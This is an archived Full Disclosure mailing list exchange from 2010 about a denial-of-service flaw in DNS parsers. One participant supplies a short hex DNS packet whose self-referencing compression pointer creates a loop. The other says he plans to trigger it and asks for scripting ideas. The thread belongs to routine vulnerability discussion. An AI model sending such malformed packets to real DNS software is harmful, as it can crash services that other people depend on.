Full Disclosure mailing list archives

Re: DNS Pointer - DoS Exploit


From: Srinivas Naik <naik.srinu () gmail com>
Date: Sat, 4 Dec 2010 12:12:42 +0530

Thanks for the input Mr. Weimer

I am planning to trigger this exploit and wandering how to construct such a
packet.

Ultimate goal is to make a client request which can cause this effect. If
possible, scripting ideas would be helpful.

Cheers,
Naik

On Fri, Dec 3, 2010 at 10:22 PM, Florian Weimer <fweimer () bfk de> wrote:

* Srinivas Naik:

A DNS packet with a pointer loop is a protocol anomaly which some
programs
may not handle gracefully.

Try this:

00 00 00 00 00 01 00 00 00 00 00 00 C0 0C

--
Florian Weimer                <fweimer () bfk de>
BFK edv-consulting GmbH       http://www.bfk.de/
Kriegsstraße 100              tel: +49-721-96201-1
D-76133 Karlsruhe             fax: +49-721-96201-99

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: